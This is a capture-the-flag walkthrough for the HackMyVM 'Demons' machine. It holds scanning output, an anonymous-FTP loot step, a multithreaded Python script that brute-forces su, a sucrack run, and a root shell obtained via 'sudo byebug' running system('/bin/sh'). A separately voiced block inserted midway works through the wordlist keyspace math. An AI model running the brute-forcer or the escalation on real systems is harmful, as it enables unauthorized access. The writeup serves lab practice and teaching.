https://hackmyvm.eu/machines/machine.php?vm=Demons
Find the IP of the machine.
~ sudo arp-scan --interface eth1 192.168.56.0/24
...
192.168.56.218 08:00:27:71:4c:b6 PCS Systemtechnik GmbH
~ nmap -sV -sC -p- 192.168.56.218 -oN ports.log
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-21 08:42 CST
Nmap scan report for 192.168.56.218
Host is up (0.00090s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.56.150
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 5e:44:8a:b1:77:0c:42:79:16:64:8d:af:b4:78:bb:b4 (RSA)
| 256 cb:0f:a7:df:7f:23:78:5a:08:e3:4f:b6:43:7c:11:84 (ECDSA)
|_ 256 a0:4a:26:bf:40:08:68:c2:b1:04:88:b4:8b:a2:45:2f (ED25519)
80/tcp open http Apache httpd 2.4.48 ((Debian))
|_http-server-header: Apache/2.4.48 (Debian)
|_http-title: DemonsCloseCall
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Log in to FTP as anonymous and download DemonsVBAMacroTools.mdb from the .toolsHidden directory.
ftp> cd .toolsHidden
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx 2 0 0 4096 Sep 16 15:17 .
drwxr-xr-x 3 0 115 4096 Sep 16 15:18 ..
-rw-r--r-- 1 0 0 55 Sep 10 17:21 .what
-rw------- 1 1000 1000 12018 Sep 10 17:19 DemonsCellsDogma.xlsx
-rwxrwxrwx 1 1000 1000 339968 Sep 16 15:17 DemonsVBAMacroTools.mdb
Open it with Access; it contains a VBA module which is password protected.
Google how to bypass the VBA project password. Then we can view the source code.
Save the SSH private key to key.txt.
Enumerate port 80. At http://ip/hell we get 2 usernames.
Try logging in as aim with the private key.
~ ssh aim@192.168.56.218 -i key.txt
Last login: Tue Sep 21 04:52:35 2021 from 192.168.56.150
aim@Demons:~$ id
uid=1001(aim) gid=1001(aim) groups=1001(aim)
There is an image in /home/aim named key8_8.jpg. This is the hint for the password of another user, agares.
In the keyboard image the keys "34odfnm" look different from the rest. This means the dictionary contains only these 7 letters/numbers.
8_8 probably means the password length is 8, so we should use "crunch 8 8".
So first we generate a dictionary with crunch; it contains 5764801 words.
~ crunch 8 8 dfnmo34 > tmp.txt
0
Crunch will now generate the following amount of data: 51883209 bytes
49 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 5764801
Because the password contains all 7 letters/numbers and is 8 characters long, there is one and only one letter/number that appears twice.
Then we use a script to make the dictionary smaller. (Thanks avijneyam#8394 for the script.)
with open("tmp.txt") as f:
    lines = f.read().splitlines()

data = []
for line in lines:
    # distinct characters of this candidate
    uline = list(set([i for i in line]))
    # how often each distinct character occurs
    counts = []
    for char in uline:
        counts.append(line.count(char))
    counts.sort()
    # keep it only if the most frequent character occurs exactly twice
    # and every other character once (all 7 symbols used, one repeated)
    if counts[-1] == 2 and counts[-2] == 1:
        data.append(line)

data = "\n".join(data)
with open("dic.txt", "w") as f1:
    f1.write(data)
The new dictionary contains only 141119 words. (Still a big one.)
~ wc -l dic.txt
141119 dic.txt
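The two dictionary sizes above follow directly from the hint, and it is worth seeing why: this is an added example (not part of the writeup) that computes both numbers from the 7-symbol alphabet and the length 8, re-implements the filter predicate with collections.Counter, and cross-checks the closed form by enumeration. It also shows why wc -l reports 141119: the script joins the words with "\n" and writes no trailing newline, and wc -l counts newline characters, so the file actually holds 141120 words (the progress counter in the later brute-force run shows the same 141120). From the defender's side this is the point of the exercise: a hint about which keys were used and how long the password is cuts the search from 5.76 million to 141 thousand candidates, about a 40x reduction.

```python
from collections import Counter
from itertools import permutations
from math import factorial

ALPHABET = "dfnmo34"   # the 7 keys singled out in key8_8.jpg
LENGTH = 8             # password length suggested by the 8_8 in the file name


def unconstrained_keyspace(alphabet: str, length: int) -> int:
    """All strings of the given length over the alphabet (what 'crunch 8 8' emits)."""
    return len(alphabet) ** length


def one_repeat_keyspace(alphabet: str, length: int) -> int:
    """Strings that use every symbol and have exactly one symbol twice.

    That needs length == len(alphabet) + 1. Pick the repeated symbol
    (len(alphabet) ways), then arrange the multiset: length! / 2!.
    """
    if length != len(alphabet) + 1:
        return 0
    return len(alphabet) * factorial(length) // 2


def fits_hint(candidate: str, alphabet: str = ALPHABET, length: int = LENGTH) -> bool:
    """The filter the page's script applies: right length, only hint symbols,
    one symbol exactly twice, every other symbol exactly once."""
    if len(candidate) != length or any(c not in alphabet for c in candidate):
        return False
    counts = sorted(Counter(candidate).values())
    return counts[-1] == 2 and counts[-2] == 1 and len(counts) == len(alphabet)


def one_repeat_keyspace_by_enumeration(alphabet: str, length: int) -> int:
    """Cross-check of the closed form: for each choice of duplicated symbol,
    count the distinct arrangements of 'all symbols plus that duplicate'."""
    if length != len(alphabet) + 1:
        return 0
    total = 0
    for dup in alphabet:
        total += len(set(permutations(alphabet + dup, length)))
    return total


def wc_l(data: str) -> int:
    """wc -l counts newline characters, not lines."""
    return data.count("\n")


if __name__ == "__main__":
    print(unconstrained_keyspace(ALPHABET, LENGTH))   # 5764801, crunch's line count
    print(one_repeat_keyspace(ALPHABET, LENGTH))      # 141120 words survive the filter
    # "\n".join(words) has len(words) - 1 newlines, hence wc -l says 141119
    print(wc_l("\n".join(["x"] * 141120)))
```

The enumeration cross-check runs in well under a second because each of the 7 multisets has only 8!/2 = 20160 distinct arrangements; it never writes a word list, it only counts.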
Then we need to brute-force su to get the password of agares.
There is a tool named sucrack at github.
https://github.com/hemp3l/sucrack
sucrack takes about 18 minutes with 100 threads. (Too many threads cause errors.)
aim@Demons:~$ time ./sucrack -a -w 100 -u agares dic.txt
password is: xxxxxxxx
real 18m19.760s
user 11m7.012s
sys 4m59.095s
We can also write a Python script to do the brute force, but it is much slower than sucrack.
#!/usr/bin/python3
import threading
from subprocess import PIPE, STDOUT, Popen

threads = []
t_nums = 100          # number of threads
correct_pass = ""     # set by the thread that finds the password
current = 0           # count of passwords tried so far
total = 0             # total count of passwords


def crack_thread(*pass_list):   # each thread tries its share of passwords against su
    global correct_pass, current, total
    for pwd in pass_list:
        if len(correct_pass) > 0:   # another thread already found it, exit
            return
        current += 1
        print(f"{current}/{total}", end="\r")
        # feed the candidate to su's password prompt, then run id in the shell it spawns
        p = Popen(['su', 'agares'], stdin=PIPE, stdout=PIPE, stderr=STDOUT)
        try:
            res = p.communicate(f"{pwd}\nid".encode("utf-8"))
        except Exception:
            p.terminate()
            continue
        # a successful su runs id, whose output contains the target user name
        if str(res).find("agares") != -1:
            print(f"\nPassword is {pwd}\n")
            correct_pass = pwd
            return


with open('mini.txt', 'r') as passfile:
    passes = passfile.readlines()
total = len(passes)
t_size = total // t_nums   # passwords per thread
t_last = total % t_nums    # if the division is not exact, one more thread takes the rest
for i in range(t_nums):
    passblk = passes[i * t_size:(i + 1) * t_size]
    t = threading.Thread(target=crack_thread, args=passblk)
    threads.append(t)
if t_last > 0:
    passblk = passes[t_size * t_nums:]
    t = threading.Thread(target=crack_thread, args=passblk)
    threads.append(t)
for t in threads:
    t.daemon = True
    t.start()
for t in threads:
    t.join()
aim@Demons:~$ time python3 mt.py
126758/141120
Password is xxxxxxxx

real 185m22.898s
user 98m29.009s
sys 62m7.093s
Check sudo -l as user agares.
agares@Demons:/home/aim$ sudo -l
[sudo] password di agares:
Corrispondenza voci Defaults per agares su Demons:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

L'utente agares può eseguire i seguenti comandi su Demons:
    (ALL : ALL) /bin/byebug
It's easy to get root now.
agares@Demons:~$ echo 'system("/bin/sh")' > tmp.rb
agares@Demons:~$ sudo byebug tmp.rb

[1, 1] in /home/agares/tmp.rb
=> 1: system("/bin/sh")
(byebug) continue
# id;hostname
uid=0(root) gid=0(root) gruppi=0(root)
Demons